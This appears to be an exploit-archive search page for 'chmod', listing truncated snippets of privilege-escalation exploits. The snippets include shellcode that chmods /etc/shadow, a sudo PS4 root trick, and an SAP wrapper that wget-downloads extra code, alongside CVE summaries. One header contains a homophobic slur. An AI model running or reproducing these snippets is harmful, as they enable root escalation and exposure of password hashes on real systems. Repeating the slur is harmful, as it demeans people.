754 matches found
McAfee VirusScan for Mac (Virex) 7.7 - Local Privilege Escalation
!/usr/bin/perl http://www.digitalmunition.com written by kf kflistsatdigitalmunitiondotcom Following symlinks is bad mmmmmmmmmmkay! $dest = "/var/cron/tabs/root"; $tgts"0" = "Virex 7.7.dmg:"/Library/Application Support/Virex/VShieldExclude.txt" "; unless $target = @ARGV print "\n\nUsage: $0...
PHP-Update <= 2.7 (admin/uploads.php) Remote Code Execution Exploit
No description provided by source. !/usr/bin/perl rgod u fucking little piece of shit faggot. way to ruin a private exploit, scumbag use strict; use IO::Socket; use MIME::Base64; use Getopt::Std; my $app = "PHP-Update 2.7"; my $type = "Remote Code Execution"; my $author = "undefined1"; my $date =...
linux/x86 chmod 0666 /etc/shadow 36 bytes
No description provided by source. / By Kris Katterjohn 8/29/2006 36 byte shellcode to chmod"/etc/shadow", 0666 and exit for Linux/x86 To remove exit: Remove the last 5 bytes 0x6a - 0x80 section .text global start start: xor edx, edx push byte 15 pop eax push edx push byte 0x77 push word 0x6f64...
linux/x86 - chmod 0666 /etc/shadow 36 bytes
linux/x86 chmod 0666 /etc/shadow 36 bytes. Shellcode exploit for linx86 platform / By Kris Katterjohn 8/29/2006 36 byte shellcode to chmod"/etc/shadow", 0666 and exit for Linux/x86 To remove exit: Remove the last 5 bytes 0x6a - 0x80 section .text global start start: xor edx, edx push byte 15 pop...
linux/x86 chmod 0666 /etc/shadow 36 bytes
Exploit for linux/x86 platform in category shellcode ========================================= linux/x86 chmod 0666 /etc/shadow 36 bytes ========================================= / By Kris Katterjohn 8/29/2006 36 byte shellcode to chmod"/etc/shadow", 0666 and exit for Linux/x86 To remove exit:...
r3mote_unix_wrapper.sh.txt
!/bin/sh Variables Ultra short URL where is located our additional code Max length : 8 chars SRC="zz.1.vg" Filename of the downloaded file Max length : 6 chars because of "-O" in wget FILE="./..." Target SAP server IP No restriction ;- TARGET="192.168.201.11" Set to /bin/echo to debug DEBUG="" So...
GLIBC (via /bin/su) Local Root Exploit
No description provided by source. / Working exploit for glibc executing /bin/su To exploit this i have used a technique that overwrites the .dtors section of /bin/su program with the address of the shellcode, so, the program executes it when main returns or exit is called Thanks a lot to rwxrwxr...
Infecting Elf Binaries to Gain Local Root Exploit
No description provided by source. gcc infR3.s -o infR3 strip infR3 find a writable binary example: ls ./infR3 /bin/ls when root calls the writable ls, chmod will be setuided Coded by [email protected] == [email protected] .text .global main infeccion de start para conseguir local root use ...
Serv-U FTP site chmod buffer overflow
Added: 07/17/2006 CVE: CVE-2004-2111 BID: 9675 OSVDB: 3713 Background Serv-U is an FTP server for Windows platforms. Problem An attacker who has logged on to the Serv-U FTP server and has a writable directory could execute arbitrary commands by sending a site chmod command with an overly long fil...
Serv-U FTP site chmod buffer overflow
Added: 07/17/2006 CVE: CVE-2004-2111 BID: 9675 OSVDB: 3713 Background Serv-U is an FTP server for Windows platforms. Problem An attacker who has logged on to the Serv-U FTP server and has a writable directory could execute arbitrary commands by sending a site chmod command with an overly long fil...
Serv-U FTP site chmod buffer overflow
Added: 07/17/2006 CVE: CVE-2004-2111 BID: 9675 OSVDB: 3713 Background Serv-U is an FTP server for Windows platforms. Problem An attacker who has logged on to the Serv-U FTP server and has a writable directory could execute arbitrary commands by sending a site chmod command with an overly long fil...
Serv-U FTP site chmod buffer overflow
Added: 07/17/2006 CVE: CVE-2004-2111 BID: 9675 OSVDB: 3713 Background Serv-U is an FTP server for Windows platforms. Problem An attacker who has logged on to the Serv-U FTP server and has a writable directory could execute arbitrary commands by sending a site chmod command with an overly long fil...
Exploit Labs Security Advisory 2006.4
EXPL-A-2006-004 exploitlabs.com Advisory 049 - - phpFormGenerator - AFFECTED PRODUCTS ================= phpFormGenerator v2.09 http://phpformgen.sourceforge.net/ OVERVIEW ======== phpFormGenerator is an easy-to-use tool to create reliable and efficient web forms in a snap. No programming of any...
CVE-2006-0640
Orbicule Undercover allows attackers with physical or root access to disable the protection by using the chmod command to change the permissions of the /private/etc/uc.app/Contents/MacOS/uc file, which prevents the service from being started in LaunchDaemon...
linux/x86 chmod/etc/shadow, 0666 + exit 32 bytes
linux/x86 chmod/etc/shadow, 0666 + exit 32 bytes. Shellcode exploit for linx86 platform / linux/x86 chmod"/etc/shadow", 0666 + exit - 32 bytes - izik / char shellcode = "\x6a\x0f" // push $0xf "\x58" // pop %eax "\x31\xc9" // xor %ecx,%ecx "\x51" // push %ecx "\x66\xb9\xb6\x01" // mov $0x1b6,%cx...
linux/x86 chmod(/etc/shadow 0666) + exit() 32 bytes
No description provided by source. / linux/x86 chmod"/etc/shadow", 0666 + exit - 32 bytes - izik [email protected] / char shellcode = "\x6a\x0f" // push $0xf "\x58" // pop %eax "\x31\xc9" // xor %ecx,%ecx "\x51" // push %ecx "\x66\xb9\xb6\x01" // mov $0x1b6,%cx "\x68\x61\x64\x6f\x77" // push...
linux/x86 chmod(/etc/shadow, 0666) + exit() 32 bytes
Exploit for linux/x86 platform in category shellcode ==================================================== linux/x86 chmod/etc/shadow, 0666 + exit 32 bytes ==================================================== / linux/x86 chmod"/etc/shadow", 0666 + exit - 32 bytes - izik / char shellcode = "\x6a\x0...
CVE-2005-3765
Exponent CMS 0.96.3 and later versions performs a chmod on uploaded files to give them execute permissions, which allows remote attackers to execute arbitrary code...
linux/x86 read0,buf,2541; chmodbuf,4755; 23 bytes
linux/x86 read0,buf,2541; chmodbuf,4755; 23 bytes. Shellcode exploit for linx86 platform / readnchmod-core.c by Charles Stevenson Example of strace output if you pass in "/bin/sh\x00" read0, "/bin/sh\0", 2541 = 8 chmod"/bin/sh", 04755 = 0 Any file path can be given. For example: /tmp/.sneakyguy T...
Sudo 1.6.8p9 - SHELLOPTSPS4 Environment Variables Privilege Escalation
Sudo 1.6.8p9 - SHELLOPTSPS4 Environment Variables Privilege Escalation Sudo local root escalation privilege vuln versions : sudo int main setuid0; system"/bin/sh"; % % gcc -o egg egg.c % setenv SHELLOPTS xtrace % setenv PS4 '$chown root:root egg' % sudo ./x.sh echo Getting root!! Getting root!! %...